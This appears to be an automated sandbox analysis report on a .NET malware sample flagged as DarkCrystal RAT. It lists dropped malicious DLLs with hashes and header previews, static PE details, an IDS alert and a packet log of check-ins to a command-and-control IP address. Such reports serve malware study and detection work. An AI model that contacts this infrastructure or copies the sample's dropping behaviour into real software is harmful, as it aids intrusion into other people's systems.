                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):342528
                                        Entropy (8bit):6.170134230759619
                                        Encrypted:false
                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 50%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                        C:\Users\user\Desktop\YRkhYJRb.log

                                        Download File
                                        Process:C:\Users\user\Desktop\lfcdgbuksf.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):294912
                                        Entropy (8bit):6.010605469502259
                                        Encrypted:false
                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 17%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                        C:\Users\user\Desktop\ZFopJXMZ.log

                                        Download File
                                        Process:C:\Users\user\Desktop\lfcdgbuksf.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):89600
                                        Entropy (8bit):5.905167202474779
                                        Encrypted:false
                                        SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                        MD5:06442F43E1001D860C8A19A752F19085
                                        SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                        SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                        SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 16%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                        C:\Users\user\Desktop\aIuPGtQu.log

                                        Download File
                                        Process:C:\Users\user\AppData\Local\staticfile.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):89600
                                        Entropy (8bit):5.905167202474779
                                        Encrypted:false
                                        SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                        MD5:06442F43E1001D860C8A19A752F19085
                                        SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                        SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                        SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 16%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                        C:\Users\user\Desktop\dNlyfpHV.log

                                        Download File
                                        Process:C:\Users\user\Desktop\lfcdgbuksf.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):46592
                                        Entropy (8bit):5.870612048031897
                                        Encrypted:false
                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 5%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                        C:\Users\user\Desktop\eQsYbLKq.log

                                        Download File
                                        Process:C:\Users\user\AppData\Local\staticfile.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):46592
                                        Entropy (8bit):5.870612048031897
                                        Encrypted:false
                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 5%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                        C:\Users\user\Desktop\hADxImWJ.log

                                        Download File
                                        Process:C:\Users\user\Desktop\lfcdgbuksf.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):33792
                                        Entropy (8bit):5.541771649974822
                                        Encrypted:false
                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 38%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                        C:\Users\user\Desktop\jDKXEIae.log

                                        Download File
                                        Process:C:\Users\user\AppData\Local\staticfile.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):294912
                                        Entropy (8bit):6.010605469502259
                                        Encrypted:false
                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 17%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                        C:\Users\user\Desktop\smdnokfM.log

                                        Download File
                                        Process:C:\Users\user\AppData\Local\staticfile.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):33792
                                        Entropy (8bit):5.541771649974822
                                        Encrypted:false
                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 38%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                        C:\Users\user\Desktop\vXIDvyqF.log

                                        Download File
                                        Process:C:\Users\user\AppData\Local\staticfile.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):64000
                                        Entropy (8bit):5.857602289000348
                                        Encrypted:false
                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 17%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                        C:\Users\user\Desktop\vZNEzLck.log

                                        Download File
                                        Process:C:\Users\user\Desktop\lfcdgbuksf.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):64000
                                        Entropy (8bit):5.857602289000348
                                        Encrypted:false
                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 17%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                        \Device\Null

                                        Download File
                                        Process:C:\Windows\System32\PING.EXE
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):502
                                        Entropy (8bit):4.630609828667227
                                        Encrypted:false
                                        SSDEEP:12:P9l5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:VfdUOAokItULVDv
                                        MD5:01E42C7D0BFC330C8CB8F87BD1F25257
                                        SHA1:EAD7E45750E84C22F8BB01AF7D3BF6CB81401F8F
                                        SHA-256:A634384A405C46CD9DB3F596A3F5A032AC51B1B7634BC8FFB9D016CDBCF74CD4
                                        SHA-512:61F024BC83B791B9A7396F4BF85F38E77E07ADFD7ECC07EE799E8A070533064FC5FB552DDFD41A3DF07E92D41D37585EA962FEF98DAB9CBD1CC4C84812CAC64A
                                        Malicious:false
                                        Preview:..Pinging 965543 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):4.891536930486634
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Windows Screen Saver (13104/52) 0.07%
                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                        File name:lfcdgbuksf.exe
                                        File size:1'657'344 bytes
                                        MD5:8c6e4c86c216b898f24ff14b417c4369
                                        SHA1:266e7d01ba11cd7914451c798199596f4d2f7b53
                                        SHA256:858fff104da670b640eff2a93b7fa4b794ae554c30a409864d00f3b7ecc1e09f
                                        SHA512:3f6416bf0b7989b522d399e151cc755783b9b7afe9cde559f8207fad6c043e24f85b22c3a583329e1620e862c7824249c536209b6be5e093a2b580c2fc52f660
                                        SSDEEP:24576:o2a0H/WPj+rsO6AOhaDxL/aySUYj79FcPX6t1:va0SKsOP1L/KzEP
                                        TLSH:A875A22439EB102AF173EFB54AD4759ACA6FFAB33707989E205103864713B81DDD163A
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."......B..........N`... ........@.. ....................................@................................

                                        File Icon

                                        Icon Hash:90cececece8e8eb0

                                        Static PE Info

                                        General

                                        Entrypoint:0x59604e
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x195ff80x53.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1980000x370.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x19a0000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000x1940540x1942006546f479437a574fb7094d17c0467384False0.4514993088849366data4.893932935610245IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0x1980000x3700x400170264a4c52d956f2cde40559f656827False0.376953125data2.8646628107101955IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x19a0000xc0x20010ddb068e7d7c8934b925a757812aa66False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_VERSION0x1980580x318data0.44823232323232326

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-11-30T22:35:45.137435+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449731213.108.22.11880TCP

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 30, 2024 22:35:43.643873930 CET4973180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:43.763952971 CET8049731213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:43.764080048 CET4973180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:43.765502930 CET4973180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:43.885374069 CET8049731213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:44.142797947 CET4973180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:44.262950897 CET8049731213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:45.093976974 CET8049731213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:45.137434959 CET4973180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:45.575629950 CET8049731213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:45.575663090 CET8049731213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:45.575725079 CET4973180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:45.661174059 CET4973180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:45.734997988 CET4973380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:45.781225920 CET8049731213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:45.855041981 CET8049733213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:45.855119944 CET4973380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:45.855330944 CET4973380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:45.975284100 CET8049733213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:46.012826920 CET4973180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:46.093929052 CET8049731213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:46.132890940 CET8049731213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:46.137476921 CET4973180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:46.200066090 CET4973380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:46.320077896 CET8049733213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:46.320116043 CET8049733213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:46.320125103 CET8049733213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:46.451206923 CET8049731213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:46.476763010 CET4973180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:46.596787930 CET8049731213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:46.825823069 CET4973180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:46.901973009 CET8049731213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:46.946120977 CET8049731213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:46.946151972 CET8049731213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:46.953927040 CET4973180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:47.210159063 CET8049733213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:47.262475014 CET4973380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:47.297281981 CET8049731213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:47.348351955 CET4973180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:47.453876972 CET8049733213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:47.496824980 CET4973380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:47.580115080 CET4973180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:47.580682993 CET4973680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:47.583745956 CET4973380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:47.700670004 CET8049731213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:47.700707912 CET8049736213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:47.700747013 CET4973180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:47.700814962 CET4973680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:47.701167107 CET4973680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:47.704082012 CET8049733213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:47.704134941 CET4973380192.168.2.4213.108.22.118
